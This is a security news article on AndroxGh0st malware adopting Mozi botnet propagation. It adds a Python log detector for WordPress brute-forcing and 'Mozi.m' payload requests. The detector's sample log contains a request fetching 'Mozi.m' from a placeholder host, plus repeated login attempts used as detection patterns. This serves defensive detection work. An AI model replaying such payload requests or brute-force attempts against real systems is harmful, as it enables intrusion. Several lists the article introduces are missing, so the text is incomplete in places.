In a concerning evolution of botnet capabilities, cybersecurity researchers have uncovered that the AndroxGh0st malware is now leveraging the Mozi botnet to expand its reach and propagation power. This collaboration aims to exploit a broader range of vulnerabilities, focusing on internet-facing and IoT applications to build a robust network of compromised devices for malicious purposes.
The AndroxGh0st Malware Campaign
AndroxGh0st, a Python-based cloud attack tool, initially gained attention for its focus on targeting Laravel applications to extract sensitive cloud service data, including AWS, SendGrid, and Twilio credentials. Active since 2022, AndroxGh0st has used known vulnerabilities in applications like the Apache web server (CVE-2021-41773) and the Laravel Framework (CVE-2018-15133) to gain unauthorized access, escalate privileges, and maintain persistence.
In January 2024, U.S. intelligence agencies reported that AndroxGh0st had been used to create botnets for targeted exploitation of victim networks. Now, according to CloudSEK's latest findings, the malware has expanded to exploit an array of vulnerabilities to bolster its botnet:
Exploited Vulnerabilities:
The AndroxGh0st botnet employs common administrative usernames combined with a consistent password pattern to brute-force access to WordPress /wp-admin panels, allowing it to compromise backend website controls.
Mozi Botnet: Expanding the Attack Vector
The Mozi botnet, primarily known for its attacks on IoT devices, has long been a persistent force in the DDoS landscape. Even after the arrest of its original authors by Chinese authorities in 2021, Mozi remained active until a kill-switch command in August 2023 brought a temporary halt. Despite this setback, Mozi's propagation mechanisms are now integrated within AndroxGh0st, enabling it to spread further through IoT device networks.
AndroxGh0st uses Mozi’s capabilities to propagate malware through devices such as Netgear DGN routers and Dasan GPON home routers, leveraging unauthenticated command execution vulnerabilities to distribute a malicious payload called “Mozi.m” from remote servers.
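Two of the behaviours described above leave traces in ordinary web-server access logs: the repeated login attempts against WordPress admin paths (the brute-forcing described in the "Exploited Vulnerabilities" section) and requests that carry the "Mozi.m" payload name. The following detector is an added example written for this article, not code from CloudSEK or from either malware family; the log lines, addresses and hostnames in it are constructed placeholders, and the threshold of five POSTs per source is an assumed tuning value.

```python
"""
Added example (not from the original article): scan Apache/nginx "combined"
access-log lines for two signals the article describes:

  1. WordPress credential brute-forcing: many POSTs to /wp-login.php or
     /wp-admin from one source address;
  2. references to the "Mozi.m" payload in a request URI.

All log lines below are constructed for this example; the IP addresses are
documentation ranges and the hostname is a placeholder.
"""
import re
from collections import Counter

# Combined log format:
# client ident user [timestamp] "METHOD URI PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)

WP_LOGIN_PATHS = ("/wp-login.php", "/wp-admin")
MOZI_MARKER = "mozi.m"          # matched case-insensitively against the URI
BRUTE_FORCE_THRESHOLD = 5       # assumed tuning value: POSTs per source

# Constructed sample log: one noisy source hammering wp-login.php, one
# ordinary visitor, and one request naming the Mozi.m payload.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2024:10:01:01 +0000] "POST /wp-login.php HTTP/1.1" 200 1200 "-" "python-requests/2.31"
203.0.113.7 - - [10/Nov/2024:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 1200 "-" "python-requests/2.31"
203.0.113.7 - - [10/Nov/2024:10:01:03 +0000] "POST /wp-login.php HTTP/1.1" 200 1200 "-" "python-requests/2.31"
198.51.100.9 - - [10/Nov/2024:10:01:04 +0000] "GET /blog/2024/post HTTP/1.1" 200 8500 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2024:10:01:05 +0000] "POST /wp-login.php HTTP/1.1" 200 1200 "-" "python-requests/2.31"
198.51.100.9 - - [10/Nov/2024:10:01:06 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2024:10:01:07 +0000] "POST /wp-login.php HTTP/1.1" 200 1200 "-" "python-requests/2.31"
203.0.113.7 - - [10/Nov/2024:10:01:08 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 0 "-" "python-requests/2.31"
192.0.2.44 - - [10/Nov/2024:10:05:00 +0000] "GET /index.php?file=http://example.invalid/Mozi.m HTTP/1.1" 404 0 "-" "Hello, world"
this line is not a valid log record
"""


def parse_line(line):
    """Return the parsed fields of one combined-format log line, or None."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def detect(log_text, threshold=BRUTE_FORCE_THRESHOLD):
    """Scan log text and return the brute-force sources and Mozi.m hits.

    Only POST requests count as login attempts: a GET to /wp-admin is just a
    redirect to the login form, whereas each POST to wp-login.php is one
    submitted credential pair.
    """
    attempts = Counter()
    mozi_hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue  # unparseable lines are skipped, not treated as hits
        path = rec["uri"].split("?", 1)[0]
        if rec["method"] == "POST" and path.startswith(WP_LOGIN_PATHS):
            attempts[rec["ip"]] += 1
        if MOZI_MARKER in rec["uri"].lower():
            mozi_hits.append((rec["ip"], rec["uri"]))
    brute_force = {ip: n for ip, n in attempts.items() if n >= threshold}
    return {"brute_force": brute_force, "mozi_hits": mozi_hits}


if __name__ == "__main__":
    result = detect(SAMPLE_LOG)
    for ip, n in result["brute_force"].items():
        print(f"possible WordPress brute force: {ip} ({n} login POSTs)")
    for ip, uri in result["mozi_hits"]:
        print(f"Mozi.m payload reference from {ip}: {uri}")
```

In production the per-source count would be evaluated over a sliding time window rather than the whole file, and the WordPress signal is best paired with a rate limit or lockout on wp-login.php so the detection also feeds a mitigation.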
Implications of the AndroxGh0st-Mozi Integration
By embedding Mozi’s propagation functionalities, AndroxGh0st gains expanded reach across IoT environments, which often lack comprehensive security measures. CloudSEK’s report highlights the strategic advantage of this collaboration:
Takeaways for Security Teams and IoT Users
The convergence of these two botnets underscores the importance of robust security practices across cloud applications, IoT devices, and other internet-facing infrastructure. To mitigate the risk of compromise by sophisticated botnets like AndroxGh0st and Mozi, organizations should consider the following best practices:
The AndroxGh0st and Mozi alliance demonstrates a concerning escalation in botnet capabilities, combining credential-stealing, DDoS, and IoT infection tactics. As cybercriminals increasingly collaborate across malware variants, organizations must remain vigilant in safeguarding their networks and internet-connected devices against these evolving threats.
© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067